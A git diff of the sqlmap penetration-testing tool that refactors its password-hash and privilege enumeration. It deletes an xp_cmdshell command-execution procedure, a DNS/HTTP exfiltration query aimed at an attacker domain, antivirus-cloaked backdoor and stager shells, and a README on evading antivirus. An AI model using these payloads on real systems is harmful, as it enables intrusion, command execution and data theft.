charsetType=CHARSET_TYPE.DIGITS) + + if not isNumPosStrValue(count): + warnMsg = "unable to retrieve the number of password " + warnMsg += "hashes for user '%s'" % user + logger.warning(warnMsg) + continue infoMsg = "fetching password hashes for user '%s'" % user logger.info(infoMsg) passwords = [] - plusOne = Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2) + plusOne = Backend.getIdentifiedDbms() in PLUS_ONE_DBMSES indexRange = getLimitRange(count, plusOne=plusOne) for index in indexRange: @@ -274,11 +320,26 @@ def getPasswordHashes(self): query = rootQuery.blind.query2 % (user, index, user) else: query = rootQuery.blind.query % (user, index, user) + + if fallback: + query = query.replace("master.dbo.fn_varbintohexstr", "sys.fn_sqlvarbasetostr") + + elif Backend.getIdentifiedDbms() in (DBMS.INFORMIX, DBMS.VIRTUOSO): + query = rootQuery.blind.query % (user,) + + elif Backend.isDbms(DBMS.HSQLDB): + query = rootQuery.blind.query % (index, user) + else: query = rootQuery.blind.query % (user, index) + if Backend.isDbms(DBMS.MYSQL): + if fallback: + query = query.replace("authentication_string", "password") + password = unArrayizeValue(inject.getValue(query, union=False, error=False)) password = parsePasswordHash(password) + passwords.append(password) if passwords: @@ -286,32 +347,30 @@ def getPasswordHashes(self): else: warnMsg = "unable to retrieve the password " warnMsg += "hashes for user '%s'" % user - logger.warn(warnMsg) + logger.warning(warnMsg) retrievedUsers.add(user) if not kb.data.cachedUsersPasswords: errMsg = "unable to retrieve the password hashes for the " - errMsg += "database users (most probably because the session " - errMsg += "user has no read privileges over the relevant " - errMsg += "system database table)" - raise SqlmapNoneDataException(errMsg) + errMsg += "database users" + logger.error(errMsg) else: for user in kb.data.cachedUsersPasswords: kb.data.cachedUsersPasswords[user] = list(set(kb.data.cachedUsersPasswords[user])) - 
storeHashesToFile(kb.data.cachedUsersPasswords) + storeHashesToFile(kb.data.cachedUsersPasswords) - message = "do you want to perform a dictionary-based attack " - message += "against retrieved password hashes? [Y/n/q]" - test = readInput(message, default="Y") + message = "do you want to perform a dictionary-based attack " + message += "against retrieved password hashes? [Y/n/q]" + choice = readInput(message, default='Y').upper() - if test[0] in ("n", "N"): - pass - elif test[0] in ("q", "Q"): - raise SqlmapUserQuitException - else: - attackCachedUsersPasswords() + if choice == 'N': + pass + elif choice == 'Q': + raise SqlmapUserQuitException + else: + attackCachedUsersPasswords() return kb.data.cachedUsersPasswords @@ -320,7 +379,7 @@ def getPrivileges(self, query2=False): rootQuery = queries[Backend.getIdentifiedDbms()].privileges - if conf.user == "CU": + if conf.user == CURRENT_USER: infoMsg += " for current user" conf.user = self.getCurrentUser() @@ -330,18 +389,18 @@ def getPrivileges(self, query2=False): conf.user = conf.user.upper() if conf.user: - users = conf.user.split(",") + users = conf.user.split(',') if Backend.isDbms(DBMS.MYSQL): for user in users: - parsedUser = re.search("[\047]*(.*?)[\047]*\@", user) + parsedUser = re.search(r"['\"]?(.*?)['\"]?\@", user) if parsedUser: users[users.index(user)] = parsedUser.groups()[0] else: users = [] - users = filter(None, users) + users = [_ for _ in users if _] # Set containing the list of DBMS administrators areAdmins = set() @@ -368,7 +427,7 @@ def getPrivileges(self, query2=False): values = inject.getValue(query, blind=False, time=False) if not values and Backend.isDbms(DBMS.ORACLE) and not query2: - infoMsg = "trying with table USER_SYS_PRIVS" + infoMsg = "trying with table 'USER_SYS_PRIVS'" logger.info(infoMsg) return self.getPrivileges(query2=True) @@ -378,7 +437,7 @@ def getPrivileges(self, query2=False): user = None privileges = set() - for count in xrange(0, len(value)): + for count in xrange(0, len(value or [])): # The first column is always the username if count == 0: user = value[count] @@ -387,43 +446,48 @@ def getPrivileges(self, query2=False): else: privilege = value[count] + if privilege is None: + continue + # In PostgreSQL we get 1 if the privilege is # True, 0 otherwise if Backend.isDbms(DBMS.PGSQL) and getUnicode(privilege).isdigit(): - if int(privilege) == 1: + if int(privilege) == 1 and count in PGSQL_PRIVS: privileges.add(PGSQL_PRIVS[count]) # In MySQL >= 5.0 and Oracle we get the list # of privileges as string - elif Backend.isDbms(DBMS.ORACLE) or (Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema): + elif Backend.isDbms(DBMS.ORACLE) or (Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema) or Backend.getIdentifiedDbms() in (DBMS.VERTICA, DBMS.MIMERSQL, DBMS.CUBRID, DBMS.SNOWFLAKE): privileges.add(privilege) # In MySQL < 5.0 we get Y if the privilege is # True, N otherwise elif Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: - if privilege.upper() == "Y": + if privilege.upper() == 'Y': privileges.add(MYSQL_PRIVS[count]) # In Firebird we get one letter for each privilege elif Backend.isDbms(DBMS.FIREBIRD): - privileges.add(FIREBIRD_PRIVS[privilege.strip()]) + if privilege.strip() in FIREBIRD_PRIVS: + privileges.add(FIREBIRD_PRIVS[privilege.strip()]) # In DB2 we get Y or G if the privilege is # True, N otherwise elif Backend.isDbms(DBMS.DB2): - privs = privilege.split(",") + privs = privilege.split(',') privilege = privs[0] - privs = privs[1] - privs = list(privs.strip()) - 
i = 1 + if len(privs) > 1: + privs = privs[1] + privs = list(privs.strip()) + i = 1 - for priv in privs: - if priv.upper() in ("Y", "G"): - for position, db2Priv in DB2_PRIVS.items(): - if position == i: - privilege += ", " + db2Priv + for priv in privs: + if priv.upper() in ('Y', 'G'): + for position, db2Priv in DB2_PRIVS.items(): + if position == i: + privilege += ", " + db2Priv - i += 1 + i += 1 privileges.add(privilege) @@ -434,7 +498,7 @@ def getPrivileges(self, query2=False): if not kb.data.cachedUsersPrivileges and isInferenceAvailable() and not conf.direct: if Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema: - conditionChar = " LIKE " + conditionChar = "LIKE" else: conditionChar = "=" @@ -443,7 +507,7 @@ def getPrivileges(self, query2=False): if Backend.isDbms(DBMS.MYSQL): for user in users: - parsedUser = re.search("[\047]*(.*?)[\047]*\@", user) + parsedUser = re.search(r"['\"]?(.*?)['\"]?\@", user) if parsedUser: users[users.index(user)] = parsedUser.groups()[0] @@ -458,39 +522,42 @@ def getPrivileges(self, query2=False): if Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema: user = "%%%s%%" % user - infoMsg = "fetching number of privileges " - infoMsg += "for user '%s'" % outuser - logger.info(infoMsg) - - if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: - query = rootQuery.blind.count2 % user - elif Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema: - query = rootQuery.blind.count % (conditionChar, user) - elif Backend.isDbms(DBMS.ORACLE) and query2: - query = rootQuery.blind.count2 % user + if Backend.isDbms(DBMS.INFORMIX): + count = 1 else: - query = rootQuery.blind.count % user + infoMsg = "fetching number of privileges " + infoMsg += "for user '%s'" % outuser + logger.info(infoMsg) - count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: + query = rootQuery.blind.count2 % user + elif Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema: + query = rootQuery.blind.count % (conditionChar, user) + elif Backend.isDbms(DBMS.ORACLE) and query2: + query = rootQuery.blind.count2 % user + else: + query = rootQuery.blind.count % user - if not isNumPosStrValue(count): - if Backend.isDbms(DBMS.ORACLE) and not query2: - infoMsg = "trying with table USER_SYS_PRIVS" - logger.info(infoMsg) + count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) - return self.getPrivileges(query2=True) + if not isNumPosStrValue(count): + if not retrievedUsers and Backend.isDbms(DBMS.ORACLE) and not query2: + infoMsg = "trying with table 'USER_SYS_PRIVS'" + logger.info(infoMsg) - warnMsg = "unable to retrieve the number of " - warnMsg += "privileges for user '%s'" % outuser - logger.warn(warnMsg) - continue + return self.getPrivileges(query2=True) + + warnMsg = "unable to retrieve the number of " + warnMsg += "privileges for user '%s'" % outuser + logger.warning(warnMsg) + continue infoMsg = "fetching privileges for user '%s'" % outuser logger.info(infoMsg) privileges = set() - plusOne = Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2) + plusOne = Backend.getIdentifiedDbms() in PLUS_ONE_DBMSES indexRange = getLimitRange(count, plusOne=plusOne) for index in indexRange: @@ -502,39 +569,43 @@ def getPrivileges(self, query2=False): query = rootQuery.blind.query2 % (user, index) elif Backend.isDbms(DBMS.FIREBIRD): query = rootQuery.blind.query % (index, 
user) + elif Backend.isDbms(DBMS.INFORMIX): + query = rootQuery.blind.query % (user,) else: query = rootQuery.blind.query % (user, index) + privilege = unArrayizeValue(inject.getValue(query, union=False, error=False)) + if privilege is None: + continue + # In PostgreSQL we get 1 if the privilege is True, # 0 otherwise if Backend.isDbms(DBMS.PGSQL) and ", " in privilege: - privilege = privilege.replace(", ", ",") - privs = privilege.split(",") + privilege = privilege.replace(", ", ',') + privs = privilege.split(',') i = 1 for priv in privs: - if priv.isdigit() and int(priv) == 1: - for position, pgsqlPriv in PGSQL_PRIVS.items(): - if position == i: - privileges.add(pgsqlPriv) + if priv.isdigit() and int(priv) == 1 and i in PGSQL_PRIVS: + privileges.add(PGSQL_PRIVS[i]) i += 1 # In MySQL >= 5.0 and Oracle we get the list # of privileges as string - elif Backend.isDbms(DBMS.ORACLE) or (Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema): + elif Backend.isDbms(DBMS.ORACLE) or (Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema) or Backend.getIdentifiedDbms() in (DBMS.VERTICA, DBMS.MIMERSQL, DBMS.CUBRID): privileges.add(privilege) # In MySQL < 5.0 we get Y if the privilege is # True, N otherwise elif Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: - privilege = privilege.replace(", ", ",") - privs = privilege.split(",") + privilege = privilege.replace(", ", ',') + privs = privilege.split(',') i = 1 for priv in privs: - if priv.upper() == "Y": + if priv.upper() == 'Y': for position, mysqlPriv in MYSQL_PRIVS.items(): if position == i: privileges.add(mysqlPriv) @@ -543,19 +614,25 @@ def getPrivileges(self, query2=False): # In Firebird we get one letter for each privilege elif Backend.isDbms(DBMS.FIREBIRD): - privileges.add(FIREBIRD_PRIVS[privilege.strip()]) + if privilege.strip() in FIREBIRD_PRIVS: + privileges.add(FIREBIRD_PRIVS[privilege.strip()]) + + # In Informix we get one letter for the highest privilege + elif Backend.isDbms(DBMS.INFORMIX): + if privilege.strip() in INFORMIX_PRIVS: + privileges.add(INFORMIX_PRIVS[privilege.strip()]) # In DB2 we get Y or G if the privilege is # True, N otherwise elif Backend.isDbms(DBMS.DB2): - privs = privilege.split(",") + privs = privilege.split(',') privilege = privs[0] privs = privs[1] privs = list(privs.strip()) i = 1 for priv in privs: - if priv.upper() in ("Y", "G"): + if priv.upper() in ('Y', 'G'): for position, db2Priv in DB2_PRIVS.items(): if position == i: privilege += ", " + db2Priv @@ -575,7 +652,7 @@ def getPrivileges(self, query2=False): else: warnMsg = "unable to retrieve the privileges " warnMsg += "for user '%s'" % outuser - logger.warn(warnMsg) + logger.warning(warnMsg) retrievedUsers.add(user) @@ -593,6 +670,6 @@ def getPrivileges(self, query2=False): def getRoles(self, query2=False): warnMsg = "on %s the concept of roles does not " % Backend.getIdentifiedDbms() warnMsg += "exist. 
sqlmap will enumerate privileges instead" - logger.warn(warnMsg) + logger.warning(warnMsg) return self.getPrivileges(query2) diff --git a/procs/mssqlserver/create_new_xp_cmdshell.sql b/procs/mssqlserver/create_new_xp_cmdshell.sql deleted file mode 100644 index 913f368c1c1..00000000000 --- a/procs/mssqlserver/create_new_xp_cmdshell.sql +++ /dev/null @@ -1,3 +0,0 @@ -DECLARE @%RANDSTR% nvarchar(999); -set @%RANDSTR%='CREATE PROCEDURE %XP_CMDSHELL_NEW%(@cmd varchar(255)) AS DECLARE @ID int EXEC sp_OACreate ''WScript.Shell'',@ID OUT EXEC sp_OAMethod @ID,''Run'',Null,@cmd,0,1 EXEC sp_OADestroy @ID'; -EXEC master..sp_executesql @%RANDSTR% diff --git a/procs/oracle/dns_request.sql b/procs/oracle/dns_request.sql deleted file mode 100644 index adb71cfb2fb..00000000000 --- a/procs/oracle/dns_request.sql +++ /dev/null @@ -1,2 +0,0 @@ -SELECT UTL_INADDR.GET_HOST_ADDRESS('%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL -# or SELECT UTL_HTTP.REQUEST('http://%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL diff --git a/shell/README.txt b/shell/README.txt deleted file mode 100644 index 6e2e08cfc74..00000000000 --- a/shell/README.txt +++ /dev/null @@ -1,11 +0,0 @@ -Due to the anti-virus positive detection of shell scripts stored inside -this folder, we needed to somehow circumvent this. As from the plain -sqlmap users perspective nothing has to be done prior to their usage by -sqlmap, but if you want to have access to their original source code use -the decrypt functionality of the ../extra/cloak/cloak.py utility. - -To prepare the original scripts to the cloaked form use this command: -find backdoor.* stager.* -type f -exec python ../extra/cloak/cloak.py -i '{}' \; - -To get back them into the original form use this: -find backdoor.*_ stager.*_ -type f -exec python ../extra/cloak/cloak.py -d -i '{}' \; diff --git a/shell/backdoor.asp_ b/shell/backdoor.asp_ deleted file mode 100644 index 720f13de61b..00000000000 Binary files a/shell/backdoor.asp_ and /dev/null differ diff --git a/shell/backdoor.aspx_ b/shell/backdoor.aspx_ deleted file mode 100644 index 178c1185ae5..00000000000 --- a/shell/backdoor.aspx_ +++ /dev/null @@ -1,2 +0,0 @@ -=%FN>&Y,&LîÎ߀;o€pZþŠ¿÷ÿê?~½¸ë´èYÕpWaV¡“Y€eyƒ?ÔÐvI¡µrrB2y€eK96¦£9š~ˆ|?evWu2êO.´†<_Krr” }‚ü]àcɘÚÔgÆCk:~·¤ëÃÓpßÍ~³ ¼g£b®ø2 \_ Œ“=éZî˜_¬…{1N)×`VYÓ–r¡¦M)ƒ› ¾/–3tœý\7<Iu5ñ(°F¶w'6à’ ƒ i“v* \,„ÐÔæ9ÕéÁm{2qݰ†¢2<V/cõ1\~b—u1?G׆â7 ønê/ “„á“f4#d>gn¬Þ;~Š^˜\6¡/{m]ø°¯ ˆiµñÒv°:õ¹TÛ Xï˜àˆcÄú_>/q’«2–Öð/]Û/戥öÖŠñ[znA‚ûo\™Á^^ë¤o”r>¤Å$¬O<ÍK¨‘ÖxöºçrB7«9L-Ja$UFsɬ˜—d\‰£ :Åë8NW˜çd --¦›ZùJÌgsáv=„*í?Cž•'#‹sÊÉŒ=\o>ÀVa×5[ †ÈÈŒÊ$ᜠå£pñ[,…vyóAìà \ No newline at end of file diff --git a/shell/backdoor.jsp_ b/shell/backdoor.jsp_ deleted file mode 100644 index 60f80dabff1..00000000000 --- a/shell/backdoor.jsp_ +++ /dev/null @@ -1,2 +0,0 @@ -=%FN>&Y,&Ä–‰ €;o  p-[ØŠ@÷ÿê?~½›. 
5ž¢f|0,?Ñ ~¡l6´Ê Ó>£_err|ÐfKe~[6¤Ñêž§„KžšrKÐr”‚:92<|“™Nf r¨˜ ‹DX VsÂ;w…0mxÖH†÷¶ß7e·~>ƒê0XW‰f«’ÙefÄ(Ž~V0kmCì*‚fŽ€nÉ5æ3S¿˜\iƒ:ƒO攓lÒÍw„¯X±©Ô ®ß1©”„²ÇáE_¸¤J&Æ><{Ÿr…zâ™4€õÞ?´‹sã™=Kà€×¨^îmݬòÏÖ?‚v¤Þ_ùÏ}«A4 ¹Ù‹n/sU‰Ç3I; 7‰‚u@?ìbÁ¯+¢#ÂͼÄýÐk{áè³à¬óTQÇIC<êÒµ Û'ÃdmŒÌl<zY|qhoOÐ;^Ag±=U³×w';×8E}‚fg9:;4‚^¡Âà%¹Sùš“œÝºoZjtë ˆhÚ6Ñ3è -~CÁˆnË_™eyt³Šò(7©Wà›|ü"Éká==Hm&À \ No newline at end of file diff --git a/shell/backdoor.php_ b/shell/backdoor.php_ deleted file mode 100644 index 7953ba9ce87..00000000000 --- a/shell/backdoor.php_ +++ /dev/null @@ -1,4 +0,0 @@ -=%FN>&Y,&I£TyŽŸ€ -íòpÂzAq¿÷Þú?}gÖí•za¡ég\2~£<<õ?”,l_ž¦Ê?g\KeÓ3oZKš,Ä<ÔõrfKNrrx¨É£v[Œ9ŠKÛWžWNd¾WÅ -oõÆ®¹Œ£vJ7;ð¢3 m5}˜„TIgûÔB—æ<h¹EU]Žuå^Ô‘’m[_Ž’•SÎß×ðîsoúJ,%)@Vc=ðç­/¾Ç°ÀøkáÀˆª‘Í>*ˆåx'×g¨.9ßp A—»5rLS|eR1¶Yè1†E+(h2M)ÁŠ…²I]5 Ƹ×?¾ˆ&#«ºÑoí*{äë•HïáÈžÑä<;ßTsÑö÷Gö!è˜ÑÖ˜85,-Æ?_éü–Õ>-¹ï»Æ²Öʼn’¬c4⹬WëÖð ’bkD’¡²ÐÒ+i'Ü¢xƒ󓞆©Ròz–Ë[š3s‰6k Ý]C_Bêõ5ž¾TÔ -bzs8G¼¬w´L®µ#ôî¨[@RB9¸¨.‡•¨®@ ‘Z^â—c»óµYvU°³‘V˜T¶Å|ä|K:ýƒ[Nê–¨:i_ZÞC/… FÝ6îkÝh“]¹Ñˆð¥93T$È1Ò†l•ºäRcÎ9h‰¬+HäŽñìsÈŽ3‘þQ䊡_9)s \ No newline at end of file diff --git a/shell/runcmd.exe_ b/shell/runcmd.exe_ deleted file mode 100644 index 109987ea1ed..00000000000 Binary files a/shell/runcmd.exe_ and /dev/null differ diff --git a/shell/stager.asp_ b/shell/stager.asp_ deleted file mode 100644 index 377109575fe..00000000000 Binary files a/shell/stager.asp_ and /dev/null differ diff --git a/shell/stager.aspx_ b/shell/stager.aspx_ deleted file mode 100644 index d160e68fbd8..00000000000 Binary files a/shell/stager.aspx_ and /dev/null differ diff --git a/shell/stager.jsp_ b/shell/stager.jsp_ deleted file mode 100644 index 730a13751a7..00000000000 Binary files a/shell/stager.jsp_ and /dev/null differ diff --git a/shell/stager.php_ b/shell/stager.php_ deleted file mode 100644 index 763e892d115..00000000000 --- a/shell/stager.php_ +++ /dev/null @@ -1,2 +0,0 @@ -=%FN>&Y,&¢$§6 €}o+çæŸ÷ÿÚ¿ÿO~Š%Ù‚.],Ê”òp-\>¦?a£vúWr~V¢¦lÑL7Ñ£?y€Kv6YšY†9€y‡AËr„0‡¹ Á®·åPoVš':(9K,æ¶Kì-*tƒk7+n¦feÛ×4T rñÏRÚ›iݯ…²yæ)ZkRH”’ü'X§©¿¼:ÕŠ¥g²ª9£ÌP[,;EëªCÖ7Û]öJïLצ×iî¤'?ÚˆÔUö¬Ð†É¦Üd(³Ž†¥êJ0FÉ#K?íêâo*K‰oetÔÛW˜GÄ>ÆXŠìñ_-™¨R›Oò?NŠ-ùß8‡3Ї -/™Ï¸*óPÆÓGÒlháTg1£~ñ£+é¨(SŽ—tXE$Êf˨8)^Ÿ‰I|y»ûôªvÂp¶i‡¸_;7æ '^‰T¤3~$dƒÅ8R‘rƒP|Ý?<\:K6Y|"oå9‚zà"(Å¡F/ueTX'ýZŽ·þ ¦Œô%,i‰jÌØ®Éu‚×{Öp*ìŒ]áþQ䊡^;ø·1 \ No newline at end of file diff --git a/sqlmap.conf b/sqlmap.conf index a4529089f44..9d0ca92db03 100644 --- a/sqlmap.conf +++ b/sqlmap.conf @@ -1,113 +1,161 @@ # At least one of these options has to be specified to set the source to -# get target urls from. +# get target URLs from. [Target] +# Target URL. +# Example: http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat=2 +url = + # Direct connection to the database. # Examples: # mysql://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME # oracle://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_SID direct = -# Target URL. 
-# Example: http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat=2 -url = - # Parse targets from Burp or WebScarab logs # Valid: Burp proxy (http://portswigger.net/suite/) requests log file path # or WebScarab proxy (http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project) # 'conversations/' folder path logFile = +# Scan multiple targets enlisted in a given textual file +bulkFile = + # Load HTTP request from a file # Example (file content): POST /login.jsp HTTP/1.1\nHost: example.com\nUser-Agent: Mozilla/4.0\n\nuserid=joe&password=guessme requestFile = -# Load session from a stored (.sqlite) file -# Example: output/www.target.com/session.sqlite -sessionFile = - -# Rather than providing a target url, let Google return target +# Rather than providing a target URL, let Google return target # hosts as result of your Google dork expression. For a list of Google -# dorks see Johnny Long Google Hacking Database at -# http://johnny.ihackstuff.com/ghdb.php. +# dorks see Google Hacking Database at +# https://www.exploit-db.com/google-hacking-database # Example: +ext:php +inurl:"&id=" +intext:"powered by " googleDork = -# These options can be used to specify how to connect to the target url. +# These options can be used to specify how to connect to the target URL. [Request] -# Data string to be sent through POST. +# Force usage of given HTTP method (e.g. PUT). +method = + +# Data string to be sent through POST (e.g. "id=1"). data = -# Character used for splitting cookie values -pDel = +# Character used for splitting parameter values (e.g. &). +paramDel = -# HTTP Cookie header. +# HTTP Cookie header value (e.g. "PHPSESSID=a8d127e.."). cookie = -# File containing cookies in Netscape/wget format +# Character used for splitting cookie values (e.g. ;). +cookieDel = + +# Live cookies file used for loading up-to-date values. +liveCookies = + +# File containing cookies in Netscape/wget format. loadCookies = -# Ignore Set-Cookie header from response +# Ignore Set-Cookie header from response. # Valid: True or False dropSetCookie = False -# HTTP User-Agent header. Useful to fake the HTTP User-Agent header value -# at each HTTP request +# Use HTTP version 1.0 (old). +# Valid: True or False +http10 = False + +# Use HTTP version 2 (experimental). +# Valid: True or False +http2 = False + +# HTTP User-Agent header value. Useful to fake the HTTP User-Agent header value +# at each HTTP request. # sqlmap will also test for SQL injection on the HTTP User-Agent value. agent = -# Use randomly selected HTTP User-Agent header +# Imitate smartphone through HTTP User-Agent header. +# Valid: True or False +mobile = False + +# Use randomly selected HTTP User-Agent header value. # Valid: True or False randomAgent = False -# HTTP Host header. +# HTTP Host header value. host = # HTTP Referer header. Useful to fake the HTTP Referer header value at # each HTTP request. referer = -# Randomly change value for the given parameter -rParam = - -# Force usage of SSL/HTTPS requests -# Valid: True or False -forceSSL = False - # Extra HTTP headers headers = Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 -# HTTP Authentication type. Useful only if the target url requires -# HTTP Basic, Digest or NTLM authentication and you have such data. -# Valid: Basic, Digest or NTLM -aType = +# HTTP Authentication type. 
Useful only if the target URL requires +# HTTP Basic, Digest, Bearer or NTLM authentication and you have such data. +# Valid: Basic, Digest, Bearer, NTLM or PKI +authType = -# HTTP authentication credentials. Useful only if the target url requires -# HTTP Basic, Digest or NTLM authentication and you have such data. +# HTTP authentication credentials. Useful only if the target URL requires +# HTTP Basic, Digest, Token or NTLM authentication and you have such data. # Syntax: username:password -aCred = +authCred = + +# HTTP Authentication PEM private/cert key file. Useful only if the target URL requires +# PKI authentication and you have such data. +# Syntax: key_file +authFile = + +# Abort on (problematic) HTTP error code (e.g. 401). +# Valid: string +abortCode = + +# Ignore (problematic) HTTP error code (e.g. 401). +# Valid: string +ignoreCode = + +# Ignore system default proxy settings. +# Valid: True or False +ignoreProxy = False + +# Ignore redirection attempts. +# Valid: True or False +ignoreRedirects = False -# HTTP Authentication certificate. Useful only if the target url requires -# logon certificate and you have such data. -# Syntax: key_file,cert_file -aCert = +# Ignore connection timeouts. +# Valid: True or False +ignoreTimeouts = False -# Use a HTTP proxy to connect to the target url. -# Syntax: http://address:port +# Use a proxy to connect to the target URL. +# Syntax: (http|https|socks4|socks5)://address:port proxy = -# HTTP proxy authentication credentials. Useful only if the proxy requires -# HTTP Basic or Digest authentication and you have such data. +# Proxy authentication credentials. Useful only if the proxy requires +# Basic or Digest authentication and you have such data. # Syntax: username:password -pCred = +proxyCred = + +# Load proxy list from a file +proxyFile = -# Ignore system default HTTP proxy. +# Use Tor anonymity network. # Valid: True or False -ignoreProxy = False +tor = False + +# Set Tor proxy port other than default. +# Valid: integer +# torPort = + +# Set Tor proxy type. +# Valid: HTTP, SOCKS4, SOCKS5 +torType = SOCKS5 + +# Check to see if Tor is used properly. +# Valid: True or False +checkTor = False # Delay in seconds between each HTTP request. # Valid: float @@ -124,29 +172,63 @@ timeout = 30 # Default: 3 retries = 3 -# Regular expression for filtering targets from provided Burp. -# or WebScarab proxy log. -# Example: (google|yahoo) -scope = +# Retry request on regexp matching content. +retryOn = + +# Randomly change value for the given parameter. +rParam = -# Url address to visit frequently during testing. +# URL address to visit frequently during testing. # Example: http://192.168.1.121/index.html -safUrl = +safeUrl = -# Test requests between two visits to a given safe url (default 0). +# POST data to send to a safe URL. +# Example: username=admin&password=passw0rd! +safePost = + +# Load safe HTTP request from a file. +safeReqFile = + +# Regular requests between visits to a safe URL (default 0). # Valid: integer # Default: 0 -saFreq = 0 +safeFreq = 0 -# Skip URL encoding of payload data +# Skip URL encoding of payload data. # Valid: True or False skipUrlEncode = False +# Parameter used to hold anti-CSRF token. +csrfToken = + +# URL address to visit to extract anti-CSRF token +csrfUrl = + +# HTTP method to use during anti-CSRF token page visit. +csrfMethod = + +# POST data to send during anti-CSRF token page visit. +csrfData = + +# Retries for anti-CSRF token retrieval. 
+csrfRetries = + +# Force usage of SSL/HTTPS +# Valid: True or False +forceSSL = False + +# Use HTTP chunked transfer encoded requests. +# Valid: True or False +chunked = False + +# Use HTTP parameter pollution. +# Valid: True or False +hpp = False + # Evaluate provided Python code before the request. # Example: import hashlib;id2=hashlib.md5(id).hexdigest() evalCode = - # These options can be used to optimize the performance of sqlmap. [Optimization] @@ -180,14 +262,35 @@ threads = 1 # parameters and HTTP User-Agent are tested by sqlmap. testParameter = -# Force back-end DBMS to this value. If this option is set, the back-end +# Skip testing for given parameter(s). +skip = + +# Skip testing parameters that not appear to be dynamic. +# Valid: True or False +skipStatic = False + +# Regexp to exclude parameters from testing (e.g. "ses"). +paramExclude = + +# Select testable parameter(s) by place (e.g. "POST"). +paramFilter = + +# Force back-end DBMS to provided value. If this option is set, the back-end # DBMS identification process will be minimized as needed. # If not set, sqlmap will detect back-end DBMS automatically by default. # Valid: mssql, mysql, mysql 4, mysql 5, oracle, pgsql, sqlite, sqlite3, # access, firebird, maxdb, sybase dbms = -# Force back-end DBMS operating system to this value. If this option is +# DBMS authentication credentials (user:password). Useful if you want to +# run SQL statements as another user, the back-end database management +# system is PostgreSQL or Microsoft SQL Server and the parameter is +# vulnerable by stacked queries SQL injection or you are connecting directly +# to the DBMS (-d switch). +# Syntax: username:password +dbmsCred = + +# Force back-end DBMS operating system to provided value. If this option is # set, the back-end DBMS identification process will be minimized as # needed. # If not set, sqlmap will detect back-end DBMS operating system @@ -203,6 +306,10 @@ invalidBignum = False # Valid: True or False invalidLogical = False +# Use random strings for invalidating values. +# Valid: True or False +invalidString = False + # Turn off payload casting mechanism # Valid: True or False noCast = False @@ -217,9 +324,6 @@ prefix = # Injection payload suffix string. suffix = -# Skip testing for given parameter(s). -skip = - # Use given script(s) for tampering injection data. tamper = @@ -238,7 +342,7 @@ level = 1 # Risk of tests to perform. # Note: boolean-based blind SQL injection tests with AND are considered # risk 1, with OR are considered risk 3. -# Valid: Integer between 0 and 3 +# Valid: Integer between 1 and 3 # Default: 1 risk = 1 @@ -266,6 +370,10 @@ regexp = # code) # code = +# Conduct thorough tests only if positive heuristic(s). +# Valid: True or False +smart = False + # Compare pages based only on the textual content. # Valid: True or False textOnly = False @@ -279,40 +387,59 @@ titles = False # techniques. [Techniques] -# SQL injection techniques to test for. -# Valid: a string composed by B, E, U, S and T where: +# SQL injection techniques to use. 
+# Valid: a string composed by B, E, U, S, T and Q where: # B: Boolean-based blind SQL injection # E: Error-based SQL injection # U: UNION query SQL injection # S: Stacked queries SQL injection # T: Time-based blind SQL injection +# Q: Inline SQL injection # Example: ES (means test for error-based and stacked queries SQL # injection types only) # Default: BEUSTQ (means test for all SQL injection types - recommended) -tech = BEUSTQ +technique = BEUSTQ # Seconds to delay the response from the DBMS. # Valid: integer # Default: 5 timeSec = 5 -# Range of columns to test for +# Disable the statistical model for detecting the delay. +# Valid: True or False +disableStats = False + +# Range of columns to test for. # Valid: range of integers # Example: 1-10 uCols = -# Character to use for bruteforcing number of columns +# Character to use for bruteforcing number of columns. # Valid: string # Example: NULL uChar = -# Domain name used for DNS exfiltration attack +# Table to use in FROM part of UNION query SQL injection. +# Valid: string +# Example: INFORMATION_SCHEMA.COLLATIONS +uFrom = + +# Column values to use for UNION query SQL injection. +# Valid: string +# Example: NULL,1,*,NULL +uValues = + +# Domain name used for DNS exfiltration attack. +# Valid: string +dnsDomain = + +# Resulting page URL searched for second-order response. # Valid: string -dnsName = +secondUrl = -# Resulting page url searched for second-order response +# Load second-order HTTP request from file. # Valid: string -secondOrder = +secondReq = [Fingerprint] @@ -405,15 +532,32 @@ dumpAll = False # Valid: True or False search = False +# Check for database management system database comments during enumeration. +# Valid: True or False +getComments = False + +# Retrieve SQL statements being run on database management system. +# Valid: True or False +getStatements = False + # Back-end database management system database to enumerate. db = -# Back-end database management system database table to enumerate. +# Back-end database management system database table(s) to enumerate. tbl = -# Back-end database management system database table column to enumerate. +# Back-end database management system database table column(s) to enumerate. col = +# Back-end database management system identifiers (database(s), table(s) and column(s)) to not enumerate. +exclude = + +# Pivot column name. +pivotColumn = + +# Use WHERE condition while table dumping (e.g. "id=1"). +dumpWhere = + # Back-end database management system database user to enumerate. user = @@ -423,13 +567,13 @@ excludeSysDbs = False # First query output entry to retrieve # Valid: integer -# Default: 0 (sqlmap will start to retrieve the query output entries from -# the first) +# Default: 0 